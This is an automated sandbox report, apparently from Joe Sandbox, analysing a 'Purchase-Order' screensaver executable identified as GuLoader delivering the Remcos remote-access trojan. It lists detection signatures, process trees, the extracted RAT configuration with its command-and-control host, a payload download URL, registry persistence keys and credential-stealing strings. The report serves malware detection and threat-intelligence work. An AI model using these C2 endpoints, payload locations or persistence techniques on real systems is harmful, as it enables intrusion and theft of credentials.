Windows Analysis Report
Purchase-Order27112024.scr.exe

Overview

General Information

Sample name: Purchase-Order27112024.scr.exe
Analysis ID: 1563962
MD5: 5e1c814fc675448c381899d325aba145
SHA1: 46a9e1b34f90d4be128fc1b6f1d698d79c93297b
SHA256: bf065b1f51eb32228108a6508ff649143a97526a06b27fa6771a85246b162f84
Tags: exe, user-threatinte1

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Drops PE files with a suspicious file extension
Initial sample is a PE file and has a suspicious name
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Purchase-Order27112024.scr.exe (PID: 1492 cmdline: "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe" MD5: 5E1C814FC675448C381899D325ABA145)
    • Purchase-Order27112024.scr.exe (PID: 4892 cmdline: "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe" MD5: 5E1C814FC675448C381899D325ABA145)
      • Purchase-Order27112024.scr.exe (PID: 3536 cmdline: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\lpbpuoswhxqpduzrodqpwzbywtn" MD5: 5E1C814FC675448C381899D325ABA145)
      • Purchase-Order27112024.scr.exe (PID: 4876 cmdline: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\njgavgdycficoinvfolrymwhxifwkll" MD5: 5E1C814FC675448C381899D325ABA145)
      • Purchase-Order27112024.scr.exe (PID: 6900 cmdline: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe /stext "C:\Users\user\AppData\Local\Temp\xlmtozosqnagqojhoyykjqqygopfdwcbcs" MD5: 5E1C814FC675448C381899D325ABA145)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["mynewpro.online:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B4UZRV", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author
00000002.00000003.2541293582.000000000641B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000002.00000003.2556975823.000000000641B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000002.00000003.2541332052.000000000641B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

System Summary

Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe, ProcessId: 4892, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe, ProcessId: 4892, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Startup key
Source: File created | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io | Data: EventID: 11, Image: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe, ProcessId: 4892, TargetFilename: C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe, ProcessId: 4892, TargetFilename: C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr

Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: 1C DB 89 90 D4 3B F1 22 6C EB B8 6B D5 3A 97 28 63 B7 C5 CB A6 2A 75 DC 35 C5 26 1F 0D 45 AA B2 0C D6 10 A8 8F D3 AC 14 B3 3E EF 12 F4 B3 ED 0C 4F 23 0B 03 53 39 F4 91 06 3D DF C6 98 C0 0E EB 86 6D A7 93 9F 51 6C 9C 63 EF FB CA A9 C0 1A E5 22 9C 31 53 A5 04 24 FD E9 3F 82 11 33 17 D8 29 CB 3F 13 AC 3B AB B6 3A CA 9C F1 CB D5 E0 FF 93 FA D5 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe, ProcessId: 4892, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-B4UZRV\exepath

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-27T16:50:39.269061+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49776 | 94.156.227.184 | 2404 | TCP
2024-11-27T16:50:42.081531+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49781 | 94.156.227.184 | 2404 | TCP
2024-11-27T16:50:42.160174+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.6 | 49782 | 178.237.33.50 | 80 | TCP
2024-11-27T16:50:31.292241+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49755 | 164.160.91.32 | 443 | TCP

AV Detection

Source: 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["mynewpro.online:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B4UZRV", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: Yara match | File source: 00000002.00000003.2541293582.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2556975823.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.2541332052.000000000641B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Purchase-Order27112024.scr.exe PID: 4892, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\subfolder1\Perissodactylic.scr | Joe Sandbox ML: detected
Source: Purchase-Order27112024.scr.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData, 6_2_00404423
Source: Purchase-Order27112024.scr.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: Purchase-Order27112024.scr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 0_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_004057D0
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 0_2_0040628B FindFirstFileW,FindClose, 0_2_0040628B
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 0_2_00402770 FindFirstFileW, 0_2_00402770
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_00402770 FindFirstFileW, 2_2_00402770
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_004057D0 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 2_2_004057D0
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_0040628B FindFirstFileW,FindClose, 2_2_0040628B
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_370010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 2_2_370010F1
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 2_2_37006580 FindFirstFileExA, 2_2_37006580
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 6_2_0040AE51 FindFirstFileW,FindNextFileW, 6_2_0040AE51
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 7_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 7_2_00407EF8
Source: C:\Users\user\Desktop\Purchase-Order27112024.scr.exe | Code function: 8_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 8_2_00407898

Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49781 -> 94.156.227.184:2404
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.6:49776 -> 94.156.227.184:2404
Source: Malware configuration extractor | URLs: mynewpro.online
Source: global traffic | TCP traffic: 192.168.2.6:49776 -> 94.156.227.184:2404
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1  Host: geoplugin.net  Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.6:49782 -> 178.237.33.50:80
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49755 -> 164.160.91.32:443
Source: global traffic | HTTP traffic detected: GET /LcyXvOliFVQGOWvhGBwKi128.bin HTTP/1.1  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0  Host: www.healthselflesssupplies.co.za  Cache-Control: no-cache
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4600867827.0000000036FD0000.00000040.10000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: Purchase-Order27112024.scr.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: Purchase-Order27112024.scr.exe, 00000006.00000002.2587239867.0000000002228000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: Purchase-Order27112024.scr.exe, 00000006.00000002.2587239867.0000000002228000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4600683206.0000000036EE0000.00000040.10000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4600683206.0000000036EE0000.00000040.10000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic | DNS traffic detected: DNS query: www.healthselflesssupplies.co.za
Source: global traffic | DNS traffic detected: DNS query: mynewpro.online
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000003.2541249987.0000000006468000.00000004.00000020.00020000.00000000.sdmp, bhv2E52.tmp.6.dr | String found in binary or memory: http://geoplugin.net/json.gp
Source: Purchase-Order27112024.scr.exe, 00000002.00000003.2541249987.0000000006468000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp4n
Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpX
Source: Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpalu
Source: Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gphy
Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpl
Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4580003040.0000000006415000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000003.2541293582.0000000006414000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpq
Source: Purchase-Order27112024.scr.exe, Perissodactylic.scr.2.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com
Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000008.00000003.2567218820.000000000096D000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000003.2567182006.000000000096D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4600867827.0000000036FD0000.00000040.10000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: Purchase-Order27112024.scr.exe, 00000008.00000003.2567218820.000000000096D000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000003.2567182006.000000000096D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.compData
Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4600867827.0000000036FD0000.00000040.10000000.00040000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
Source: Purchase-Order27112024.scr.exe, 00000006.00000002.2586522096.0000000000193000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
Source: Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
            Source: Purchase-Order27112024.scr.exeString found in binary or memory: https://login.yahoo.com/config/login
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://www.digicert.com/CPS0
            Source: Purchase-Order27112024.scr.exe, Purchase-Order27112024.scr.exe, 00000008.00000002.2567391458.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: Purchase-Order27112024.scr.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063A8000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmp, Purchase-Order27112024.scr.exe, 00000002.00000002.4580580413.0000000008020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.bin
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.bin_I
            Source: Purchase-Order27112024.scr.exe, 00000002.00000002.4579842444.00000000063E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/LcyXvOliFVQGOWvhGBwKi128.binfH
            Source: bhv2E52.tmp.6.drString found in binary or memory: https://www.office.com/
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
            Source: unknownHTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.6:49755 version: TLS 1.2
